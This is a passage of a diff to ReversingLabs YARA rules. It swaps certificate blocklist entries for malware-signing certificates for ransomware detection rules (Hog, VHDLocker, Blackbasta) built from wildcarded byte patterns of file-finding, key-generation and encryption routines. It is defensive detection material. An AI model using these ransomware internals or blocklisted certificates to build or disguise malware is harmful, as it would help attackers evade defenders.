04 24 8B 4C 24 ?? + 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 + ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 4C 24 ?? 39 C1 0F 85 ?? ?? ?? ?? 89 + 0C 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 + 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 44 24 ?? B9 ?? ?? ?? ?? F7 E9 8B 44 24 ?? 01 C2 C1 F8 ?? C1 FA ?? 29 C2 89 D0 + 89 D3 F7 E9 8D 04 13 C1 F8 ?? C1 FB ?? 29 D8 83 C0 ?? 89 44 24 ?? 31 C9 EB ?? 8B 54 + 24 ?? 8D 4A ?? 8B 44 24 ?? 39 C1 7D ?? 89 4C 24 ?? 8B 44 24 ?? 89 04 24 8D 0D ?? ?? + ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 90 + E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 90 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DES SP Z O O" and (pe.signatures[i].serial=="00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures[i].serial=="c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d") and 1594590024<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_02C5351936Abe405Ac760228A40387E8 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Hog : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Hog ransomware." author = "ReversingLabs" - id = "6a1e5115-ac72-57a3-8418-7c81f38f76af" - date = "2023-11-08" - modified = "2023-11-08" + id = "b4f26acf-5ff1-5c49-8cfa-8f619af84efd" + date = "2021-10-12" + modified = "2021-10-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4384-L4400" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5a990f8d1a3f467cdafa0f625bc162745d9201e15ce43fdc93cd6b1730572e89" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Hog.yara#L1-L70" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c5cbc79fee9083ed3befa6b0d348f2d38064bb9012b8f0ca11afd7137243866d" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Hog" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RESURS-RM OOO" and pe.signatures[i].serial=="02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" and 1589932801<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1Ecd829Adcc55D9D6Afe30Dc371Ebda6 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "db9f022b-f650-5d40-ae84-4df92b0f3a96" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4402-L4420" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "02955f4df7deccab52cdd82fd04d5012db7440f85c87d750fa9f81ff85e2dab0" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $generate_key = { + 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08 + 16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ?? + 07 6F ?? ?? ?? ?? DC 11 ?? 2A + } + $find_files = { + 16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F + ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? + ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? + ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? + ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C + 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ?? + ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ?? + DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A + } + $encrypt_files_p1 = { + 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? + ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19 + 73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? + ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? + 07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ?? + ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ?? + ?? ?? ?? DE ?? 26 DE ?? 2A + } + $encrypt_files_p2 = { + 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ?? + ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B + 73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ?? + ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ?? + ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? + ?? DC 26 DE ?? 02 2A 11 ?? 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Komp.IT" and (pe.signatures[i].serial=="00:1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" or pe.signatures[i].serial=="1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6") and 1588723200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($generate_key) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B0167124Ca59149E64D292Eb4B142014 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Vhdlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects VHDLocker ransomware." author = "ReversingLabs" - id = "384ce73e-3ad5-54d9-a140-cb242f9a91e6" - date = "2023-11-08" - modified = "2023-11-08" + id = "696f8145-342b-5da5-b9ec-6f0d16afc465" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4422-L4440" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "10d980d4a71dab4679376f5a6d6a6999e0b59af4f25587a7b8d1ef52a7808cc9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.VHDLocker.yara#L1-L152" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "39d1fbfc79d5ea866498bb1e40d2290469df774ce65b1da04a85c0e4e5b4493c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "VHDLocker" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Euro May SP Z O O" and (pe.signatures[i].serial=="00:b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" or pe.signatures[i].serial=="b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14") and 1585267200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_112613B7B5F696Cf377680F6463Fcc8C : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "c0015521-b163-51ab-8c27-da3b1a8df084" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4442-L4458" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "50fd35617e059a5fe9d9e0fdb4b880c20e406357bbb2d037f9e6e9db47b8e49f" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 + ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 50 51 E8 ?? ?? + ?? ?? 83 C4 ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 33 DB 8D 95 ?? ?? ?? ?? 53 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? + ?? ?? 89 9D ?? ?? ?? ?? 33 F6 8B FF 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? 46 83 FE ?? + 7C ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D + B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 8D + } + $encrypt_files_p2 = { + 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 57 FF 15 ?? ?? + ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? + ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 57 FF 15 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? 52 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D 95 ?? ?? ?? + ?? 52 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 81 BD ?? + ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? + ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 11 9D ?? ?? ?? ?? + 83 FA ?? 0F 84 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 + } + $encrypt_files_p3 = { + 75 ?? 2B C2 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 8D 14 00 A1 ?? ?? ?? ?? 52 53 50 FF D6 + 8B 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 52 FF D6 8B 15 ?? + ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? 51 52 FF D6 8B 0D ?? ?? ?? ?? 6A + ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 51 FF D6 8B 0D ?? ?? ?? ?? 6A ?? 8D 95 + ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 51 FF D6 EB ?? 8B 9D ?? ?? ?? ?? 6A ?? 33 + C9 51 51 B8 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? + ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 + ?? 8B B5 ?? ?? ?? ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 8D 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 52 FF 15 ?? ?? ?? ?? 33 C9 + 51 51 33 C0 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 + 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 68 ?? ?? ?? ?? 33 F6 + 8D 8D ?? ?? ?? ?? 33 C0 56 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8D 95 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? + 52 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B + ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 57 8D + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? + ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 + ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? + 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 + } + $find_files_p2 = { + D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 + ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 + C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 BB ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 90 + 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? + ?? ?? ?? 57 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? + ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 3A C1 75 ?? 01 0D ?? ?? ?? + ?? 11 35 ?? ?? ?? ?? EB ?? 01 0D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 + 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5E 33 CD + B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $get_logical_drives_list_p1 = { + 8D 85 ?? ?? ?? ?? 50 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 + 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? + ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 + A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 + FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 + ?? 57 8D 8D ?? ?? ?? ?? 2B C2 51 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF + ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? + ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? + ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF 15 + ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 + D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB + } + $get_logical_drives_list_p2 = { + 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 89 B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? + ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 39 78 ?? 72 ?? 8B 00 8D + 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? + ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 39 78 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? + ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 + FE ?? 0F 8C ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B + 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Infoware Cloud Limited" and pe.signatures[i].serial=="11:26:13:b7:b5:f6:96:cf:37:76:80:f6:46:3f:cc:8c" and 1566518400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($get_logical_drives_list_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B3F906E5E6B2Cf61C5E51Be79B4E8777 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara 